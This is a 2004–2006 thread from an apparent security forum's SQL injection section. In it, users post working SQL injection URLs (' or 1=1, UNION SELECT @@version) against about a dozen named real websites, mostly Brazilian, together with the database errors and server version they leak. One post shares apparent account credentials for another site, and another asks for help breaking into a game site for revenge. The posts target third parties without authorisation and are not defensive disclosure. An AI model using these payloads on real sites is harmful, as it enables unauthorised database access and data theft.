Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 16, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 69 Members: 0 Total: 69 Full disclosure SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI 4 vulnerabilities in ibmsecurity 32 vulnerabilities in IBM Security Verify Access xlibre Xnest security advisory & bugfix releases APPLE-SA-10-29-2024-1 Safari 18.1 SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600) SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333) APPLE-SA-10-28-2024-8 visionOS 2.1 APPLE-SA-10-28-2024-7 tvOS 18.1 APPLE-SA-10-28-2024-6 watchOS 11.1 APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1 APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1 IT Security and Insecurity Portal www.waraxe.us Forum Index -> Sql injection -> Some BRazililian sites with querystring vuln. View previous topic :: View next topic SQL Injection help u out in someway? Yes 25% [ 3 ] Yes 25% [ 3 ] Special cases only 25% [ 3 ] Special cases only 25% [ 3 ] Not @ all 0% [ 0 ] Not @ all 0% [ 0 ] Total Votes : 12 Some BRazililian sites with querystring vuln. Posted: Mon Jul 19, 2004 3:00 am r0ot Regular user Joined: Jul 18, 2004 Posts: 15 I tried google to gimme some asp sites using querystring as parameter input... I just realized that every site (except a little 1) from brazil is vuln. to sql injection.. wtf..bad programmers hahaha 0:-l format of list is: URL DESCR sep --------- URL.... http://www.editoraerica.com.br/busca_cat.asp?procura='%20or%201=1 Microsoft OLE DB Provider for ODBC Drivers erro '80040e09' [TCX][MyODBC]You have an error in your SQL syntax near '')or (subcategoria like '' or 1=1') order by nome ' at line 1 /busca_cat.asp, line 36 ----- http://www.buscaki.com.br/categorias.asp?cat=' Microsoft OLE DB Provider for ODBC Drivers error '80040e09' [TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 /categorias.asp, line 105 ----- http://www.graded.br/navega.asp?stt=125&cat=' HTTP 500.100 - Internal Server Error - ASP error Technical Information (for support personnel) Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'cd_link = 125 AND cd_secao = ''. /navega.asp, line 13 ----- http://www.abiquim.org.br/english/content.asp?princ='%20or%201=1 ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /english/content.asp, line 68 ------ http://www.siemens.com.br/coluna1.asp?canal='%20or%20having%201=1 ------ http://www.timaster.com.br/ext_raiox.asp?prof='&entrevista=nao Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /revista/raiox/raiox.asp, line 85 ------ http://www.valoronline.com.br/valoreconomico/materia.asp?id='%20or%201=1 Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' or 1=1'. D:\DFS\SITES\VALORONLINE\VALORECONOMICO\../sql.asp, line 52 ------ http://www.abong.org.br/novosite/links_pag.asp?link1='%20or%201=1 Microsoft OLE DB Provider for ODBC Drivers erro '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /novosite/links_pag.asp, line 136 ------ http://www.infnet.com.br/curso/curso.asp?idcurso=15&idParceira='%20or%201=1 Microsoft VBScript runtime error '800a000d' Type mismatch: 'Cint' D:\DOMAINS\INFNET\CURSO\../include/menuglobal.asp, line 71 ------ http://www.diariosp.com.br/informatica/default.asp?Editoria='%20or%201=1%20&id=292042&Retranca=292044 Microsoft VBScript runtime (0x800A000D) Type mismatch: '[string: "' or 1=1 "]' /informatica/default.asp, line 73 ------ http://www.netlink.com.br/index.asp?p='%20or%201=1 Erro de tempo de execu??o do Microsoft VBScript erro '800a0009' Subscrito fora do intervalo: '[number: 1]' /index.asp, line 129 _________________ Posted: Mon Jul 19, 2004 9:49 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Good findings! I have seen hundreds of websites with sql injection holes - wind0ws, *nix, MySQL, M$ SQL, PostgreSql, Oracle - all the platforms are presented. But anyway, most easy is to find sql injection in ".jsp", ".cfm" and ".asp" scripts, because there is no magic_quotes Many webisites will try to hide sql injections and other holes in their p00r coded scripts and you see http 500 errors or just redirects to index page. And even in those cases big part of "protected" sites are affected by "blind" sql injection sploits - have done, and successfully Posted: Mon Jul 19, 2004 10:04 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Little addition: http://www.abong.org.br/novosite/institucional/associadas_pagpubli4.asp?midia1=Folhetos'%20UNION%20ALL%20SELECT%20null,null,null,@@version,null,null,null,null,null,null,null,null,9999-- Busca por Publica??es - Tipo de m?dia: - M?dia Folhetos - CEDAP: Teoria do Conhecimento e Educa??o Popular Folhetos - CEDAP: - Elei??es/1988 e o Movimento Popular Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) - : :):) Posted: Tue Jul 20, 2004 1:24 pm ernad Regular user Joined: Jun 01, 2004 Posts: 13 Location: Serbia Nice but this sites are not so big look at this www.playahead.com 20,000 online every time writen in asp try there sql injection i think have many... Posted: Wed Jul 21, 2004 2:53 am r0ot Regular user Joined: Jul 18, 2004 Posts: 15 Its written in .net (using ASPX) pages, making hard job for sql inj. :/ thus.. btw wtf is site is that? _________________ Posted: Thu Jul 22, 2004 12:47 am ernad Regular user Joined: Jun 01, 2004 Posts: 13 Location: Serbia the is aspx sorry on my err they are in swdish this is my big rpoblem i`m register you can join in with username: tutinac and password: sandzak36320 in instlinger you have to write some stuffs in html and many thing what can be explitable wtf what is this you mean whata fu~ck is this site one of the best sites in europe join in and watch on url maby you get some idea i`m trying so many times but everytime without luck or without idea how to do sql injection... and waraxe why you dont try to work on aspx and asp there is new portal aspnuke they is writen in asp but like nuke they are same adress www.aspnuke.com this site download them i`m see them on one site but i cant to run them because i need some other db i dont know... but is very nice Posted: Thu Jul 22, 2004 12:34 pm r0ot Regular user Joined: Jul 18, 2004 Posts: 15 Btw.. the fuck was a surprise cause i really dun know wat to do in the site ^^ not for offending or someth, sorry leh Btw, wats bout ? hehehehehe juz kidding _________________ Posted: Sun Jul 25, 2004 12:59 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Well, i will look @ aspnuke soon. This is, what i got within first 20 seconds: http://www.aspnuke.com/module/discuss/forum/thread.asp?topicid=2&threadid=-99999999 Code: HTTP 500.100 - Internal Server Error - ASP error Internet Information Services Technical Information (for support personnel) Error Type: Microsoft VBScript runtime (0x800A0006) Overflow: 'CInt' D:\INETPUB\WWWROOT\ASPNUKE\MODULE\DISCUSS\FORUM\../../../lib/site_lib.asp, line 98 Browser Type: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Page: GET /module/discuss/forum/thread.asp Time: Sunday, July 25, 2004, 5:54:41 AM More information: Microsoft Support Hi i wanna only now if is possible to inj this site. Posted: Tue Feb 08, 2005 11:39 pm jonny Beginner Joined: Feb 09, 2005 Posts: 1 Hi i was damage in this site: http://www.muonline.com from one guy that in game called me and said me that he has hacked my game account. I know that there is a bug in the source code of this site to take user and pass information from db. Sombody can hel me to find this sql inj to take my revenge? tnx a lot sorry for my little english Re: Hi i wanna only now if is possible to inj this site. Posted: Wed Feb 09, 2005 7:57 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman jonny wrote: Hi i was damage in this site: http://www.muonline.com from one guy that in game called me and said me that he has hacked my game account. I know that there is a bug in the source code of this site to take user and pass information from db. Sombody can hel me to find this sql inj to take my revenge? tnx a lot sorry for my little english not revenge for you, you have luck in scriptkiddies.com Posted: Wed Feb 16, 2005 7:50 pm zer0-c00l Advanced user Joined: Jun 25, 2004 Posts: 72 Location: BRAZIL! stop fucking websites from my country help! Posted: Sun Mar 05, 2006 10:42 pm sidnelsonplus Beginner Joined: Mar 05, 2006 Posts: 1 who has some ideia to make sql here injection here? already I tried all things.. and the maximum that obtained was an overflow. Microsoft VBScript runtime error '800a000d' Type mismatch: '[string: "9999 union all selec"]' /shownews.asp, line 14 http://xxx.xxx.xxx/shownews.asp?id=9999%20union%20all%20select MEMB_INFO is an table name... edited by LINUX read the rules Some BRazililian sites with querystring vuln. www.waraxe.us Forum Index -> Sql injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds